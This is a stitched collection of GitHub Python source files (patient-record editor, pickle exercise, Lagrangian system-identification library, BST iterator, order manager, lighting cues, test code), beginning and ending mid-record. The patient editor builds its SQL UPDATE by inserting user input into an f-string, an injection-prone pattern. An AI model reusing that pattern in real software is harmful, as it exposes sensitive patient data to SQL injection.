\"radiology\")\n            self.loadPics(row[11], \"mri\")\n            self.loadPics(row[12], \"xray\")\n            self.loadPics(row[13], \"ctscan\")\n            self.loadPics(row[14], \"pics\")\n            self.dxs.insertPlainText(row[15])\n            self.comments.insertPlainText(row[16])\n        conn.commit()\n        conn.close()\n\n# this function saves the images listed in the widget and returns their combined, comma-separated file names\n    def savePic(self, list, id, flag):\n        items = []\n        for index in range(list.count()):\n            if list.item(index).text() != '':\n                items.append(list.item(index))\n        datapath = jsondata()\n        filepath = datapath.getdatapath()\n        files = []\n        for item in range(0, len(items)):\n            split_tup = os.path.splitext(items[item].text())\n            file_name = str(id)+\"_\"+flag+\"_\"+str(item)+split_tup[1]\n            if len(items[item].text().split(\"/\"))>1: # only copy files that are not already in the database folder\n                shutil.copy(items[item].text(), filepath+\"/images/\"+file_name)\n            files.append(file_name)\n        if len(files)>0:\n            path = files[0]\n            for i in range(1, len(files)):\n                path = path + ',' + files[i]\n        else:\n            path = ''\n        return path\n\n    def saveChanges_clicked(self):\n        id = self.id.text()\n        name = self.name.text()\n        sex = self.sex.currentText()\n        age = 
self.age.text()\n        address = self.address.text()\n        cc = self.cc.toPlainText()\n        oe = self.oe.toPlainText()\n        rf = self.rf.toPlainText()\n        pathreport = self.pathreport.toPlainText()\n        # radiology = self.printlist(self.listRediology)\n        # mri = self.printlist(self.listMri)\n        # ctscan = self.printlist(self.listCtscan)\n        # xray = self.printlist(self.listXray)\n        # pics = self.printlist(self.listPics)\n        dxs = self.dxs.toPlainText()\n        comments = self.comments.toPlainText()\n\n        # saving pics\n        radiology = self.savePic(self.listRediology,id,\"Rediology\")\n        mri = self.savePic(self.listMri,id,\"Mri\")\n        xray = self.savePic(self.listXray,id,\"Xray\")\n        ctscan = self.savePic(self.listCtscan,id,\"Ctscan\")\n        pics = self.savePic(self.listPics,id,\"Pics\")\n\n        # inserting the data into the database\n        datapath = jsondata()\n        database = datapath.getdatapath()+\"/database.db\"\n        conn = sqlite3.connect(database)\n        sql = f\"UPDATE entry SET Name='{name}', Sex='{sex}', Age='{age}', Address='{address}', CC='{cc}', OE='{oe}', RF='{rf}', Path='{pathreport}', Rediology='{radiology}', Mri='{mri}', Xray='{xray}', Ctscan='{ctscan}', Pics='{pics}', Dxs='{dxs}', Comments='{comments}' WHERE ID='{str(id)}'\"\n        conn.execute(sql)\n        conn.commit()\n        conn.close()\n\n        self.close()\n\n# app = QApplication([])\n# window = EditWindow()\n# window.location_on_the_screen()\n# window.show()\n# app.exec_()","repo_name":"suvashsumon/Patient-Database-Management-System","sub_path":"editItem.py","file_name":"editItem.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"39081480365","text":"\"\"\"\nIn this second exercise, you have to create a .py file and inside it create a Vehiculo class,\nmake an object of it, save it to a file, and then load it back.\n\"\"\"\n\nimport pickle \n\nclass Vehiculo:\n    marca = ''\n    modelo = ''\n    costo = ''\n    puertas = ''\n\n    def __init__(self, marca, modelo, costo, puertas):\n        self.marca = marca\n        self.modelo = modelo\n        self.costo = costo\n        self.puertas = puertas \n\nmyDreamCar = Vehiculo('Lamborghini', 'Sesto Elemento', '1500000', '3')\n\ncarFile = open('Entradas & Salidas/ficheroEj2.bin','wb')\npickle.dump(myDreamCar, carFile)\ncarFile.close()\n\ncarFile = open('Entradas & Salidas/ficheroEj2.bin','rb')\nsavedCar = pickle.load(carFile)\ncarFile.close()\n\nprint(savedCar.__repr__())\nprint(savedCar.marca)\nprint(savedCar.modelo)\nprint(savedCar.costo,'$')","repo_name":"iTzBigPerrito/OpenBootcamp","sub_path":"Python/Entradas & Salidas/Ejercicio2 I-O.py","file_name":"Ejercicio2 I-O.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24814917323","text":"# swea 1213 String\n\nfor tc in range(1,11):\n    T = int(input())\n    word = input()\n    data = input()\n    ans = 0\n    for i in range(len(data)-len(word)+1):\n        if data[i:i+len(word)] == word:\n            ans+=1\n    print(f'#{tc} {ans}')","repo_name":"JiIJu/algorithm_algorithm","sub_path":"학사 지이주/2023/7월/0731/1213.py","file_name":"1213.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73405695468","text":"'''written by Adam Purnomo'''\n\nimport HLsearch as HL\nimport numpy as np\n\nfrom sympy import symbols, simplify, derive_by_array\n\nimport sympy\nimport torch\nimport 
sys\nsys.path.append(r'../../HLsearch/')\n\n\ndef LagrangianLibraryTensor(x, xdot, expr, states, states_dot, scaling=False, scales=None):\n \"\"\"\n A function dedicated to build time-series tensor for the lagrangian equation.\n The lagrangian equation is described as follow\n L = sum(c_k*phi_k)\n q_tt = (D^2L_qdot2)^-1*(tau + DL_q - D^2L_qdotq)\n\n #Params:\n x : values of state variables in torch tensor. In [x,x_dot] format. Each row presents states at one time\n xdot : values of states_dot variables in torch tensor. In [x_dot,x_doubledot] format. Each row presents states at one time\n expr : list of basis function (str) (d,)\n states : list states variable description (str) (n,)\n states_dot : time derivative state_variable (str) (n,)\n\n #Return:\n Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n Eta : time-series of double derivative of basis functions w.r.t qdot and q \n Delta : time-series of derivative of basis functions w.r.t q \n \"\"\"\n from torch import cos, sin\n x = torch.from_numpy(x)\n xdot = torch.from_numpy(xdot)\n n = len(states)\n q = sympy.Array(np.array(sympy.Matrix(states[:n//2])).squeeze().tolist())\n qdot = sympy.Array(\n np.array(sympy.Matrix(states[n//2:])).squeeze().tolist())\n phi = sympy.Array(np.array(sympy.Matrix(expr)).squeeze().tolist())\n phi_q = derive_by_array(phi, q)\n phi_qdot = derive_by_array(phi, qdot)\n phi_qdot2 = derive_by_array(phi_qdot, qdot)\n phi_qdotq = derive_by_array(phi_qdot, q)\n\n i, j, k = np.array(phi_qdot2).shape\n l = x.shape[0]\n Delta = torch.ones(j, k, l)\n Zeta = torch.ones(i, j, k, l)\n Eta = torch.ones(i, j, k, l)\n\n for idx in range(len(states)):\n locals()[states[idx]] = x[:, idx]\n locals()[states_dot[idx]] = xdot[:, idx]\n\n for n in range(j):\n for o in range(k):\n delta = eval(str(phi_q[n, o]))\n if(isinstance(delta, int)):\n Delta[n, o, :] = delta*Delta[n, o, :]\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(delta) - torch.min(delta)\n delta = delta/scales\n Delta[n, o, :] = delta\n\n for m in range(i):\n for n in range(j):\n for o in range(k):\n zeta = eval(str(phi_qdot2[m, n, o]))\n eta = eval(str(phi_qdotq[m, n, o]))\n\n if(isinstance(zeta, int)):\n Zeta[m, n, o, :] = zeta*Zeta[m, n, o, :]\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(zeta) - torch.min(zeta)\n zeta = zeta/scales\n Zeta[m, n, o, :] = zeta\n\n if(isinstance(eta, int)):\n Eta[m, n, o, :] = eta*Eta[m, n, o, :]\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(eta) - torch.min(eta)\n eta = eta/scales\n Eta[m, n, o, :] = eta\n return Zeta, Eta, Delta\n\n\ndef lagrangianforward(coef, Zeta, Eta, Delta, xdot, device):\n \"\"\"\n Computing time series of q_tt (q double dot) prediction\n #Params:\n coef : Coefficient corresponding to each basis function\n mask : filter for coefficient below a certain threshold\n Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n Eta : time-series of double derivative of basis functions w.r.t qdot and q \n Delta : time-series of derivative of basis functions w.r.t q \n xdot : Time-series of states_dot data \n \"\"\"\n weight = coef\n DL_q = torch.einsum('jkl,k->jl', Delta, weight)\n DL_qdot2 = torch.einsum('ijkl,k->ijl', Zeta, weight)\n DL_qdotq = torch.einsum('ijkl,k->ijl', Eta, weight)\n\n if(torch.is_tensor(xdot) == False):\n xdot = torch.from_numpy(xdot).to(device).float()\n q_t = xdot[:, :2].T\n\n C = torch.einsum('ijl,il->jl', DL_qdotq, q_t)\n B = DL_q\n A = torch.einsum('ijl->lij', 
DL_qdot2)\n    invA = torch.linalg.pinv(A)\n    invA = torch.einsum('lij->ijl', invA)\n    q_tt = torch.einsum('ijl,jl->il', invA, B-C)\n    return q_tt\n\n\ndef ELforward(coef, Zeta, Eta, Delta, xdot, device):\n    \"\"\"\n    Computing time series of total sum of Euler-Lagrange equation\n    #Params:\n    coef : Coefficient corresponding to each basis function\n    Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n    Eta : time-series of double derivative of basis functions w.r.t qdot and q \n    Delta : time-series of derivative of basis functions w.r.t q \n    xdot : Time-series of states_dot data \n\n    #Returns:\n    El : Time series of the left hand side of the Euler-Lagrange equation (n, time-series)\n    \"\"\"\n    weight = coef\n    DL_q = torch.einsum('jkl,k->jl', Delta, weight)\n    DL_qdot2 = torch.einsum('ijkl,k->ijl', Zeta, weight)\n    DL_qdotq = torch.einsum('ijkl,k->ijl', Eta, weight)\n    n = xdot.shape[1]\n\n    if(torch.is_tensor(xdot) == False):\n        xdot = torch.from_numpy(xdot).to(device).float()\n    q_t = xdot[:, :n//2].T\n    q_tt = xdot[:, n//2:].T\n\n    C = torch.einsum('ijl,il->jl', DL_qdotq, q_t)\n    B = DL_q\n    A = torch.einsum('ijl,il->jl', DL_qdot2, q_tt)\n    EL = A + C - B\n    return EL\n\n\ndef Upsilonforward(Zeta, Eta, Delta, xdot, device):\n    \"\"\"\n    Computing time series of total sum of Euler-Lagrange equation\n    #Params:\n    Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n    Eta : time-series of double derivative of basis functions w.r.t qdot and q \n    Delta : time-series of derivative of basis functions w.r.t q \n    xdot : Time-series of states_dot data \n\n    #Returns:\n    Upsilon : Time series of the left hand side of the Euler-Lagrange equation before being multiplied by the weights (n, time-series)\n    \"\"\"\n    n = xdot.shape[1]\n\n    if(torch.is_tensor(xdot) == False):\n        xdot = torch.from_numpy(xdot).to(device).float()\n    q_t = xdot[:, :n//2].T\n    q_tt = xdot[:, n//2:].T\n\n    A = torch.einsum('ijkl,il->jkl', Zeta, q_tt)\n    B = torch.einsum('ijkl,il->jkl', Eta, q_t)\n    C = Delta\n\n    Upsilon = A + B - C\n    return Upsilon\n\n\ndef tauforward(coef, Zeta, Eta, Delta, xdot, device):\n    '''\n    Computing time series of tau (external input) prediction\n    #Params:\n    coef : Coefficient corresponding to each basis function\n    mask : filter for coefficient below a certain threshold\n    Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n    Eta : time-series of double derivative of basis functions w.r.t qdot and q \n    Delta : time-series of derivative of basis functions w.r.t q \n    xdot : Time-series of states_dot data \n    '''\n    weight = coef\n    DL_q = torch.einsum('jkl,k->jl', Delta, weight)\n    DL_qdot2 = torch.einsum('ijkl,k->ijl', Zeta, weight)\n    DL_qdotq = torch.einsum('ijkl,k->ijl', Eta, weight)\n\n    if(torch.is_tensor(xdot) == False):\n        xdot = torch.from_numpy(xdot).to(device).float()\n    q_t = xdot[:, :2].T\n    q_tt = xdot[:, 2:].T\n\n    C = torch.einsum('ijl,il->jl', DL_qdotq, q_t)\n    B = DL_q\n    A = torch.einsum('ijl,il->jl', DL_qdot2, q_tt)\n    tau = A + C - B\n    return tau\n\n\ndef SymGradient(func_description, q):\n    '''\n    Symbolic gradient of list of basis function w.r.t quantity q where q is subset of the states (can be position, velocity or acceleration)\n    #Params:\n    func_description : list of basis functions (str) (d,)\n    q : list of a quantity subset of the states (str) (d,)\n\n    #Returns:\n    dfunc_dq : gradient of basis functions w.r.t q (sympy matrix) (d,n)\n    '''\n    q = sympy.Matrix(q)\n    func_description = sympy.Matrix(func_description)\n    dfunc_dq = 
simplify(func_description.jacobian(q))\n    return dfunc_dq\n\n\ndef TimeDerivativeSym(func_description, states, states_dot):\n    '''\n    Symbolic time derivative of basis function\n\n    #Params:\n    func_description : list basis functions (str) (d,)\n    states : list states variable description (str) (n,)\n    states_dot : time derivative state_variable (str) (n,)\n\n    #Return\n    dfunc_dt : symbolic time derivative of basis functions list (sympy matrix) (d,)\n    '''\n    func = sympy.Matrix(func_description)\n    x = sympy.Matrix(states)\n    x_dot = sympy.Matrix(states_dot)\n    grad = func.jacobian(x)\n    dfunc_dt = grad*x_dot\n    return dfunc_dt\n\n\ndef TimeDerivativeSymGradient(gradfunc_description, states, states_dot):\n    '''\n    Symbolic time derivative of gradient of basis function w.r.t. quantity q which is a subset of the states\n\n    #Params:\n    gradfunc_description : gradient of basis function w.r.t. quantity q (sympy matrix) (d,n)\n    states : list states variable description (str) (n,)\n    states_dot : time derivative state_variable (str) (n,)\n\n\n    #Return\n    dgradfunc_description_dt : Symbolic time derivative of gradient of basis function w.r.t. quantity q (sympy matrix) (d,n)\n    '''\n    x = sympy.Matrix(states)\n    x_dot = sympy.Matrix(states_dot)\n\n    temp = gradfunc_description[:, 0].jacobian(x)*x_dot\n    for i in range(1, len(states)//2):\n        temp = temp.row_join(gradfunc_description[:, i].jacobian(x)*x_dot)\n    dgradfunc_description_dt = temp\n    return dgradfunc_description_dt\n\n\ndef SymVectorFuncSumOverStates(matrix_func):\n    '''\n    Sum of gradient of symbolic basis function over states\n    #Params\n    matrix_func : gradient of symbolic basis function (sympy matrix) (d,n)\n\n    #Return\n    Sigma : sum of gradient of symbolic basis function over states (sympy matrix) (d) \n    '''\n\n    p, m = matrix_func.shape\n    sigma = matrix_func[:, 0]\n    for i in range(1, m):\n        sigma += matrix_func[:, i]\n    return sigma\n\n\ndef timeDerivativeLibraryMatrix(x, xdot, function_description, states, states_dot):\n    \"\"\"\n    #Params:\n    x : values of state variables in torch tensor. In [x,x_dot] format. Each row presents states at one time\n    xdot : values of states_dot variables in torch tensor. In [x_dot,x_doubledot] format. Each row presents states at one time\n    function_description : list of basis functions (str) (d,)\n    states : list states variable description (str) (n,)\n    states_dot : time derivative state_variable (str) (n,)\n\n    #Return:\n    time-series of time-derivative functions in torch.tensor\n    \"\"\"\n    df_dt = TimeDerivativeSym(function_description, states, states_dot)\n    df_dt = [str(f) for f in df_dt]\n    from torch import cos, sin\n    if((torch.is_tensor(x) == False) or (torch.is_tensor(xdot) == False)):\n        x = torch.from_numpy(x)\n        xdot = torch.from_numpy(xdot)\n\n    column = []\n    n = len(states)\n    # Assign data to states and states dot\n    for j in range(n):\n        locals()[states[j]] = x[:, j]\n        locals()[states_dot[j]] = xdot[:, j]\n    # evaluate each function in function expression with data\n    for func in df_dt:\n        column.append(eval(func))\n    column = torch.stack(column)\n    column = column.T\n    return column\n\n\ndef LibraryMatrix(x, function_description, states, scaling=True):\n    \"\"\"\n    #Params:\n    x : values of variables in torch tensor. In [x,x_dot] format. 
Each row presents states at one time\n function_description : list of basis functions (str) (d,)\n states : symbolic states' names (str)\n\n #Return:\n time-serie of calculated functions in torch.tensor\n \"\"\"\n\n from torch import cos, sin\n if(torch.is_tensor(x) == False):\n x = torch.from_numpy(x)\n\n column = []\n n = len(states)\n # Assign data to data_description (states)\n for j in range(n):\n locals()[states[j]] = x[:, j]\n # evaluate each function in function expression with data\n for func in function_description:\n k = eval(func)\n if(isinstance(k, int)):\n column.append(k*torch.ones(x.shape[0]))\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(k) - torch.min(k)\n k = k/scales\n column.append(k)\n column = torch.stack(column)\n column = column.T\n return column\n\n\ndef timeDerivativeLibraryTensor(x, xdot, matrix_func, states, states_dot):\n \"\"\"\n #Params:\n x : values of state variables in torch tensor. In [x,x_dot] format. Each row presents states at one time\n xdot : values of states_dot variables in torch tensor. In [x_dot,x_doubledot] format. Each row presents states at one time\n matrix_func : matrix of basis functions (str) (d,n)\n states : list states variable description (str) (n,)\n states_dot : time derivative state_variable (str) (n,)\n\n #Return:\n time-series of time-derivative functions in torch.tensor\n \"\"\"\n from torch import cos, sin\n if((torch.is_tensor(x) == False) or (torch.is_tensor(xdot) == False)):\n x = torch.from_numpy(x)\n xdot = torch.from_numpy(xdot)\n\n d, n = matrix_func.shape[0], len(states)\n b = x.shape[0]\n Eta = torch.ones(d, n//2, b)\n\n # Assign data to states and states dot\n for j in range(n):\n locals()[states[j]] = x[:, j]\n locals()[states_dot[j]] = xdot[:, j]\n\n # evaluate each function in function expression with data\n for i in range(matrix_func.shape[0]):\n for j in range(matrix_func.shape[1]):\n k = eval(str(matrix_func[i, j]))\n if(isinstance(k, int)):\n Eta[i, j, :] = k*Eta[i, j, :]\n else:\n Eta[i, j, :] = k\n return Eta\n","repo_name":"AdamPurnomo/Extended-Lagrangian-SINDy-xL-SINDy-","sub_path":"Source/Python Script/xLSINDy.py","file_name":"xLSINDy.py","file_ext":"py","file_size_in_byte":14238,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"17490754793","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nExample of iterate a tree:\niterator = BSTIterator(root)\nwhile iterator.hasNext():\n node = iterator.next()\n do something for node\n\"\"\"\n\n\nclass BSTIterator:\n \"\"\"\n @param: root: The root of binary tree.\n \"\"\"\n def __init__(self, root):\n self.stack = []\n self.node = root\n\n \"\"\"\n @return: True if there has next node, or false\n \"\"\"\n def hasNext(self):\n return self.node or self.stack\n\n \"\"\"\n @return: return next node\n \"\"\"\n def next(self):\n node = self.node\n stack = self.stack\n\n while node:\n stack.append(node)\n node = node.left\n\n node = stack.pop()\n\n nxt = node\n\n self.node = node.right\n\n return nxt\n","repo_name":"jaychsu/algorithm","sub_path":"lintcode/86_binary_search_tree_iterator.py","file_name":"86_binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"37"} +{"seq_id":"26086633587","text":"from components.orders.order import Order, StopOrder, LimitOrder\n\n\nclass OrderManager:\n def 
__init__(self, strategy):\n        self.orders = []\n        if strategy is None:\n            raise ValueError('Strategy is required')\n        self.strategy = strategy\n        self.symbol = strategy.symbol\n\n\n    def market_order(self, side: str, quantity: int):\n        order = Order(\n            type='market',\n            side=side,\n            qty=quantity,\n            symbol=self.symbol.symbol,\n            filled_avg_price=self.strategy.data.close,\n            timestamp=self.strategy.data.timestamp,\n        )\n        self.orders.append(order)\n        return order\n\n    def stop_loss_order(self, side: str, quantity: int, price: float):\n        order = StopOrder(\n            type='stop',\n            side=side,\n            qty=quantity,\n            symbol=self.symbol.symbol,\n            stop_price=price,\n            timestamp=None,\n        )\n        self.orders.append(order)\n        return order\n\n    def limit_order(self, side: str, quantity: int, price: float):\n        order = LimitOrder(\n            type='limit',\n            side=side,\n            qty=quantity,\n            symbol=self.symbol.symbol,\n            limit_price=price,\n            timestamp=None,\n        )\n        self.orders.append(order)\n        return order\n\n    def add(self, order: Order):\n        self.orders.append(order)\n\n    def all(self):\n        return self.orders\n\n    def filter(self, **kwargs):\n        return [o for o in self.orders if all([o.__getattribute__(k) == v for k, v in kwargs.items()])]\n\n    def __len__(self):\n        return len(self.orders)\n\n    def summary(self):\n        return {\n            'total': len(self.orders),\n        }\n\n    def show(self):\n        print('showing orders for strategy: {}'.format(self.strategy.name))\n        print('\\n'.join([str(o) for o in self.orders]))","repo_name":"robswc/stratis","sub_path":"app/components/orders/order_manager.py","file_name":"order_manager.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"}
{"seq_id":"72777157546","text":"class Employee():\n    no_of_leave= 8\n    def __init__(self,aname , asaalary, arole): # init func. 
runs automatically; no explicit call is needed\n        self.name = aname\n        self.salary = asaalary\n        self.role = arole\n    def printditails(self):\n        return f\"name is {self.name} and salary is {self.salary} and role is {self.role}\"\n    @classmethod\n    def chnge_leaves(cls , newleaves):\n        cls.no_of_leave = newleaves\n\n\nharry = Employee('harry', 40384 ,'instructor')\nrohan = Employee('rohan',10338,'student')# constructor\n\nharry.chnge_leaves(33)\n\nprint (harry.no_of_leave)\n","repo_name":"KojoAning/PYHTON_PRACTICE","sub_path":"opps4.py","file_name":"opps4.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"35125523326","text":"from xmllib import XMLParser\nfrom os import path\nimport string\nimport lightboard\nfrom ExpatXMLParser import ExpatXMLParser, DOMNode\nimport gtk\nfrom gtk import *\nfrom gtk.glade import *\nfrom completion import completion\nimport time\nimport instrument\nimport string\nimport cue_edit\n\nfrom omniORB import CORBA\nfrom idl import LB, LB__POA\n\nedit_menu=None\n\ndef initialize():\n    reset()\n\ndef reset():\n    global edit_menu\n    lb.cue={}\n    gdk.threads_enter()\n    menubar=lb.menubar\n    for m in menubar.get_children():\n        if (m.get_children()[0].get() == \"Cue\"):\n            menubar.remove(m)\n\n    cue1=gtk.MenuItem(\"Cue\")\n    menubar.append(cue1)\n\n    cue1_menu=gtk.Menu()\n    cue1.set_submenu(cue1_menu)\n\n    edit1=gtk.MenuItem(\"Edit\")\n    cue1_menu.append(edit1)\n    edit_menu=gtk.Menu()\n    edit1.set_submenu(edit_menu)\n\n    new1=gtk.MenuItem(\"New\")\n    new1.connect(\"activate\", newCue_cb, None)\n    cue1_menu.append(new1)\n\n    menubar.show_all()\n    gdk.threads_leave()\n    \ndef shutdown():\n    pass\n\ndef load(tree):\n    for section in tree.find(\"cues\"):\n        for cue in section.find(\"cue\"):\n            c=Cue(cue.attrs['name'])\n            for parent in cue.find(\"parent\"):\n                l = parent.attrs['level']\n                if l[-1]=='%':\n                    l=l[:-1]\n                l=float(l)\n                c.parent.append([string.strip(parent.data), l])\n            for instrument in cue.find(\"instrument\"):\n                for key, value in instrument.attrs.items():\n                    if key == \"name\": continue\n                    if not c.instrument.has_key(instrument.attrs['name']):\n                        c.instrument[instrument.attrs['name']]={}\n                    c.instrument[instrument.attrs['name']][key]=value\n\n    for c in lb.cue.values():\n        c.validate()\n    \ndef save():\n    tree = DOMNode('cues')\n    for i in lb.cue.values():\n        tree.append(i.to_tree())\n    return tree\n\ndef newCue_cb(widget, data=None):\n    # called from menu\n    gdk.threads_leave()\n    c = Cue('', update_refs=0)\n    editor = cue_edit.CueEditor()\n    c.editor = editor\n    c.set_editing(1)\n    editor.set_cue(c)\n    editor.edit()\n    gdk.threads_enter()\n    \n\nclass Cue:\n    def __init__(self, name, update_refs=1):\n        self.instrument={}\n        self.apparent={}\n        self.valid=0\n        self.build_time=0\n        self.parent=[]\n        self.name=name\n        self.core_cue = LB.Cue(name, [])\n        self.editor=None\n        self.edit_menu_item = None\n\n        if (update_refs):\n            self.update_refs()\n\n    def update_refs(self):\n        gdk.threads_enter()\n        try:\n            if (lb.cue.has_key(self.name)):\n                old = lb.cue[self.name]\n                edit_menu.remove(old.edit_menu_item)\n\n            lb.cue[self.name]=self\n            \n            i=gtk.MenuItem(self.name)\n            self.edit_menu_item=i\n            edit_menu.append(i)\n            i.connect(\"activate\", self.edit_cb, None)\n            i.show()\n        finally:\n            gdk.threads_leave()\n\n    def has_parent(self, name):\n        if (self.name == name):\n            return 1\n        for (pname, level) in self.parent:\n            if (lb.cue[pname].has_parent(name)):\n                return 1\n        return 0\n\n    def send_update(self):\n        tree = DOMNode('cues')\n        tree.append(self.to_tree())\n        lb.sendData(tree)\n\n    
def invalidate(self):\n self.valid = 0\n self.apparent={}\n self.build_time=0\n self.validate()\n \n def validate(self):\n for name, lvl in self.parent:\n lb.cue[name].validate()\n if (lb.cue[name].build_time <= self.build_time):\n continue\n if (self.valid):\n self.apparent={}\n self.valid=0\n self.build_time=0\n if (not self.valid):\n for name, lvl in self.parent:\n for name, idict in lb.cue[name].apparent.items():\n if (not self.apparent.has_key(name)):\n self.apparent[name]={}\n for attr, value in idict.items():\n if (attr=='level'):\n value = lb.value_to_string('level', [lb.value_to_core ('level', value)[0] * (lvl/100.0)])\n self.apparent[name][attr]=value\n for name, idict in self.instrument.items():\n if (not self.apparent.has_key(name)):\n self.apparent[name]={}\n for attr, value in idict.items():\n self.apparent[name][attr]=value\n self.core_cue = self.to_core()\n self.valid=1\n self.build_time=time.time()\n \n def copy(self):\n c = Cue(self.name, update_refs=0)\n c.parent=self.parent[:]\n c.instrument=self.instrument.copy()\n c.edit_menu_item = self.edit_menu_item\n c.invalidate()\n return c\n \n def to_core(self):\n incue = self\n cue = LB.Cue(self.name, [])\n\n for (name, dict) in incue.apparent.items():\n try:\n i = lb.instrument[name].to_core_InstAttrs(dict)\n cue.ins = cue.ins + i\n except:\n pass\n cue.ins=lb.sort_by_attr(cue.ins, 'name') \n return cue\n\n def to_tree(self):\n cue = DOMNode('cue', {'name':self.name})\n for name, lvl in self.parent:\n lvl = lb.value_to_string('level', [lvl])\n parent = DOMNode('parent', {'level':lvl})\n parent.add_data(name)\n cue.append(parent)\n for name, idict in self.instrument.items():\n dict = idict.copy()\n dict['name']=name\n instrument = DOMNode('instrument', dict)\n cue.append(instrument)\n return cue\n\n def edit(self):\n cue = self.copy()\n editor = cue_edit.CueEditor()\n cue.editor = editor\n cue.set_editing(1)\n editor.set_cue(cue)\n editor.edit()\n\n def edit_cb(self, widget, data):\n \"\"\" Called from lightboard->program->edit \"\"\"\n\n gdk.threads_leave()\n self.edit()\n gdk.threads_enter()\n \n def set_editing(self, editing):\n if (editing):\n if (self.edit_menu_item is not None):\n self.edit_menu_item.set_sensitive(0)\n else:\n if (self.edit_menu_item is not None):\n self.edit_menu_item.set_sensitive(1)\n self.editor = None\n \n","repo_name":"inaugust/lb","sub_path":"gtklb/cue.py","file_name":"cue.py","file_ext":"py","file_size_in_byte":6493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"5173123744","text":"from seal.lib.mr.hit_processor_chain_link import HitProcessorChainLink\nfrom seal.lib.io.sam_formatter import SamFormatter\n\nclass EmitSamLink(HitProcessorChainLink):\n def __init__(self, context, event_monitor, next_link = None):\n super(EmitSamLink, self).__init__(next_link)\n self.ctx = context\n self.output_formatter = SamFormatter(strip_pe_tag=True)\n self.event_monitor = event_monitor\n\n def process(self, original, pair):\n for hit in pair:\n if hit:\n k, v = self.output_formatter.format(hit).split(\"\\t\", 1)\n self.ctx.emit(str(k), str(v))\n self.event_monitor.count(\"emitted sam records\", 1)\n\n super(EmitSamLink, self).process(original, pair) # forward pair to next element in chain\n\nclass RapiEmitSamLink(HitProcessorChainLink):\n def __init__(self, context, event_monitor, hi_rapi_instance, next_link = None):\n super(RapiEmitSamLink, self).__init__(next_link)\n self.ctx = context\n self.event_monitor = event_monitor\n self.hi_rapi = 
hi_rapi_instance\n\n def process(self, original, rapi_frag):\n with self.event_monitor.time_block(\"format sam\", write_status=False):\n sam_lines = self.hi_rapi.format_sam_for_fragment(rapi_frag).split('\\n')\n with self.event_monitor.time_block(\"emit alignments\", write_status=False):\n for line in sam_lines:\n k, v = line.split(\"\\t\", 1)\n self.ctx.emit(str(k), str(v))\n self.event_monitor.count(\"emitted sam records\", 1)\n\n super(RapiEmitSamLink, self).process(original, rapi_frag) # forward rapi_frag to next element in chain\n","repo_name":"crs4/seal","sub_path":"seal/lib/mr/emit_sam_link.py","file_name":"emit_sam_link.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"71074628588","text":"import unittest\n\nimport datetime\nimport requests\nfrom utils.common.config_loader import ConfigLoader\nfrom base_class import BaseClass\nimport time\nfrom uuid import uuid4\n\n\nclass TestReExtract(BaseClass):\n def assert_done_task(self, task_id, error_count = 0):\n response = TestReExtract.admin_client.get_task(task_id)\n self.assertEqual(200, response.status_code)\n self.assertTaskInfo(response.content[\"task_info\"], task_id, \"list descriptors\", error_count)\n\n def assert_image_not_found(self, task_id, descriptors):\n response = TestReExtract.admin_client.get_task_errors(task_id)\n self.assertEqual(200, response.status_code)\n self.assertEqual(len(descriptors), response.content[\"error_count\"])\n notFoundImages = [error['message'].split(\"Object not found, target id: \")[1] for error in\n response.content[\"errors\"]]\n self.assertSetEqual(set(descriptors), set(notFoundImages))\n\n def check_descriptor_in_new_core(self, descriptor_id):\n new_luna = ConfigLoader.get_property(\"reextract_luna_core_url\")\n response = requests.get(\"{}/descriptors?id={}\".format(new_luna, descriptor_id))\n self.assertEqual(200, response.status_code)\n\n @unittest.skipIf(not ConfigLoader.get_int_property(\"test_reextract\"), \"disable re-extract tests\")\n def test_reextract_several_descriptors(self):\n descriptor_1 = self.createDescriptor(TestReExtract.employer)\n descriptor_2 = self.createDescriptor(TestReExtract.employer)\n\n response = TestReExtract.admin_client.start_reextract_descriptors({\"descriptors\": [descriptor_1, descriptor_2]})\n self.assertEqual(201, response.status_code)\n task_id = response.content[\"task_id\"]\n time.sleep(2)\n self.assert_done_task(task_id)\n for descriptor in (descriptor_1, descriptor_2):\n self.check_descriptor_in_new_core(descriptor)\n\n @unittest.skipIf(not ConfigLoader.get_int_property(\"test_reextract\"), \"disable re-extract tests\")\n def test_bad_json(self):\n error_cases = [{\"params\": {\"descriptor\": [str(uuid4()), str(uuid4())]}},\n {\"params\": {\"descriptors\": str(uuid4())}},\n {\"params\": {\"descriptors\": [str(uuid4()), \"aaa\"]}},\n ]\n for error_case in error_cases:\n with self.subTest(params = error_case[\"params\"]):\n response = TestReExtract.admin_client.start_reextract_descriptors(error_case[\"params\"])\n\n self.assertEqual(400, response.status_code)\n self.assertEqual(response.content[\"error_code\"], 12022)\n self.assertTrue(response.content[\"detail\"].startswith(\"Failed to validate input json. 
